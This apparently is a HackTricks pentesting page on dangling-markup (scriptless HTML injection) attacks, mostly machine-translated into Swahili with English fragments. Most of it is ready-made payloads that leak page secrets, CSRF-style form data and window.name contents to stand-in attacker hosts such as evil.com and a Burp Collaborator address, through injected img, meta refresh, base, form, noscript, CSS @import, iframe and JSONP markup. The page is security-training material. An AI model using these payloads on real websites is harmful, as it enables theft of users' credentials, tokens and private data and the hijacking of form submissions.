14 KiB
Dangling Markup - HTML scriptless injection
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Resume
Teknolojia hii inaweza kutumika kutoa taarifa kutoka kwa mtumiaji wakati HTML injection inapatikana. Hii ni muhimu sana ikiwa hupati njia yoyote ya kutumia XSS lakini unaweza kuiingiza baadhi ya vitambulisho vya HTML.
Pia ni muhimu ikiwa siri fulani imehifadhiwa kwa maandiko wazi katika HTML na unataka kuipatia kutoka kwa mteja, au ikiwa unataka kupotosha utekelezaji wa script fulani.
Mbinu kadhaa zilizozungumziwa hapa zinaweza kutumika kupita baadhi ya Content Security Policy kwa kupeleka taarifa kwa njia zisizotarajiwa (vitambulisho vya html, CSS, vitambulisho vya http-meta, fomu, msingi...).
Main Applications
Stealing clear text secrets
Ikiwa unaiingiza <img src='http://evil.com/log.cgi?
wakati ukurasa umepakuliwa, mwathirika atakutumia msimbo wote kati ya vitambulisho vya img
vilivyoingizwa na nukuu inayofuata ndani ya msimbo. Ikiwa siri fulani iko katika kipande hicho, utaiba hiyo (unaweza kufanya jambo hilo hilo kwa kutumia nukuu mbili, angalia ni ipi inaweza kuwa ya kuvutia zaidi kutumia).
Ikiwa vitambulisho vya img
vinakatazwa (kwa sababu ya CSP kwa mfano) unaweza pia kutumia <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
Note that Chrome inazuia URL za HTTP zikiwa na "<" au "\n" ndani yake, hivyo unaweza kujaribu mipango mingine ya itifaki kama "ftp".
You can also abuse CSS @import
(itapeleka msimbo wote hadi ipate ";")
<style>@import//hackvertor.co.uk? <--- Injected
<b>steal me!</b>;
Unaweza pia kutumia <table
:
<table background='//your-collaborator-id.burpcollaborator.net?'
You could also insert a <base
tag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):
<base target=' <--- Injected
steal me'<b>test</b>
Kuiba fomu
<base href='http://evil.com/'>
Kisha, fomu zinazotuma data kwenye njia (kama <form action='update_profile.php'>
) zitatuma data hizo kwenye eneo la hatari.
Kuiba fomu 2
Weka kichwa cha fomu: <form action='http://evil.com/log_steal'>
hii itabadilisha kichwa cha fomu inayofuata na data zote kutoka kwa fomu zitatumwa kwa mshambuliaji.
Kuiba fomu 3
Kitufe kinaweza kubadilisha URL ambapo taarifa za fomu zitapelekwa kwa kutumia sifa "formaction":
<button name=xss type=submit formaction='https://google.com'>I get consumed!
Mshambuliaji anaweza kutumia hii kuiba taarifa.
Pata mfano wa shambulio hili katika andiko hili.
Kuiba siri za maandiko wazi 2
Kwa kutumia mbinu iliyotajwa hivi karibuni kuiba fomu (kuingiza kichwa kipya cha fomu) unaweza kisha kuingiza uwanja mpya wa pembejeo:
<input type='hidden' name='review_body' value="
na hii sehemu ya kuingiza itakuwa na maudhui yote kati ya nukta zake mbili na nukta inayofuata katika HTML. Shambulio hili linachanganya "Kuharibu siri za maandiko wazi" na "Kuharibu fomu2".
Unaweza kufanya kitu sawa kwa kuingiza fomu na tag <option>
. Takwimu zote hadi </option>
iliyofungwa itatumwa:
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
Uingizaji wa parameta za fomu
Unaweza kubadilisha njia ya fomu na kuingiza thamani mpya ili hatua isiyotarajiwa ifanyike:
<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'> ← Injected lines
<form action="/change_settings.php"> ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value=""> ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>
Kuiba siri za maandiko wazi kupitia noscript
<noscript></noscript>
Ni lebo ambayo maudhui yake yatafasiriwa ikiwa kivinjari hakisaidii javascript (unaweza kuwasha/kuzima Javascript katika Chrome kwenye chrome://settings/content/javascript).
Njia ya kutoa maudhui ya ukurasa wa wavuti kutoka kwenye eneo la sindano hadi chini kwenye tovuti inayodhibitiwa na mshambuliaji itakuwa kuingiza hii:
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
Bypassing CSP with user interaction
Kutoka kwenye portswiggers research unaweza kujifunza kwamba hata kutoka kwenye mazingira yanayozuia CSP zaidi bado unaweza kuhamasisha data kwa kutumia maingiliano ya mtumiaji. Katika tukio hili tutatumia payload:
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
Note that you will ask the victim to click on a link that will redirect him to payload controlled by you. Also note that the target
attribute inside the base
tag will contain HTML content until the next single quote.
This will make that the value of window.name
if the link is clicked is going to be all that HTML content. Therefore, as you control the page where the victim is accessing by clicking the link, you can access that window.name
and exfiltrate that data:
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
Misleading script workflow 1 - HTML namespace attack
Weka tag mpya na id ndani ya HTML ambayo itabadilisha ile inayofuata na thamani ambayo itakuwa na athari kwenye mtiririko wa script. Katika mfano huu unachagua na nani taarifa itashirikiwa:
<input type='hidden' id='share_with' value='fredmbogo'> ← Injected markup
...
Share this status update with: ← Legitimate optional element of a dialog
<input id='share_with' value=''>
...
function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}
Misleading script workflow 2 - Script namespace attack
Unda mabadiliko ndani ya javascript namespace kwa kuingiza vitambulisho vya HTML. Kisha, mabadiliko haya yataathiri mtiririko wa programu:
<img id='is_public'> ← Injected markup
...
// Legitimate application code follows
function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC) ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}
function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC; ← Condition always evaluates to true
...
}
Abuse of JSONP
Ikiwa unapata interface ya JSONP unaweza kuwa na uwezo wa kuita kazi yoyote na data yoyote:
<script src='/editor/sharing.js'>: ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}
<script src='/search?q=a&call=set_sharing'>: ← Injected JSONP call
set_sharing({ ... })
Au unaweza hata kujaribu kutekeleza baadhi ya javascript:
<script src='/search?q=a&call=alert(1)'></script>
Iframe abuse
Hati ya mtoto ina uwezo wa kuona na kubadilisha mali ya location
ya mzazi wake, hata katika hali za cross-origin. Hii inaruhusu kuingiza script ndani ya iframe ambayo inaweza kuelekeza mteja kwenye ukurasa wowote:
<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
Hii inaweza kupunguzika kwa kutumia kitu kama: sandbox=' allow-scripts allow-top-navigation'
Iframe pia inaweza kutumika vibaya kuvuja taarifa nyeti kutoka ukurasa tofauti kwa kutumia sifa ya iframe name. Hii ni kwa sababu unaweza kuunda iframe ambayo inajifunga yenyewe ikitumia uingizaji wa HTML ambao unafanya taarifa nyeti kuonekana ndani ya sifa ya iframe name na kisha kufikia jina hilo kutoka iframe ya awali na kuvuja.
<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
Kwa maelezo zaidi angalia https://portswigger.net/research/bypassing-csp-with-dangling-iframes
<meta abuse
Unaweza kutumia meta http-equiv
kufanya vitendo kadhaa kama kuweka Cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1">
au kufanya uelekeo (katika sekunde 5 katika kesi hii): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />
Hii inaweza kuepukwa kwa CSP kuhusu http-equiv ( Content-Security-Policy: default-src 'self';
, au Content-Security-Policy: http-equiv 'self';
)
New <portal HTML tag
Unaweza kupata utafiti wa kuvutia sana kuhusu udhaifu unaoweza kutumika wa tag <portal hapa.
Wakati wa kuandika hii unahitaji kuwezesha tag portal kwenye Chrome katika chrome://flags/#enable-portals
au haitafanya kazi.
<portal src='https://attacker-server?
HTML Leaks
Sio njia zote za kuvuja muunganisho katika HTML zitakuwa na manufaa kwa Dangling Markup, lakini wakati mwingine zinaweza kusaidia. Angalia hapa: https://github.com/cure53/HTTPLeaks/blob/master/leak.html
SS-Leaks
Hii ni mchanganyiko kati ya dangling markup na XS-Leaks. Kutoka upande mmoja, udhaifu unaruhusu kuingiza HTML (lakini si JS) katika ukurasa wa asili moja ya ile tutakayoshambulia. Kutoka upande mwingine hatutashambulia moja kwa moja ukurasa ambapo tunaweza kuingiza HTML, bali ukurasa mwingine.
{% content-ref url="ss-leaks.md" %} ss-leaks.md {% endcontent-ref %}
XS-Search/XS-Leaks
XS-Search zimeelekezwa kwenye kuondoa taarifa za cross-origin kwa kutumia shambulio la upande. Hivyo, ni mbinu tofauti na Dangling Markup, hata hivyo, baadhi ya mbinu zinatumia ujumuishaji wa vitambulisho vya HTML (pamoja na bila utekelezaji wa JS), kama CSS Injection au Lazy Load Images.
{% content-ref url="../xs-search/" %} xs-search {% endcontent-ref %}
Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
References
- https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057
- http://lcamtuf.coredump.cx/postxss/
- http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/
- https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.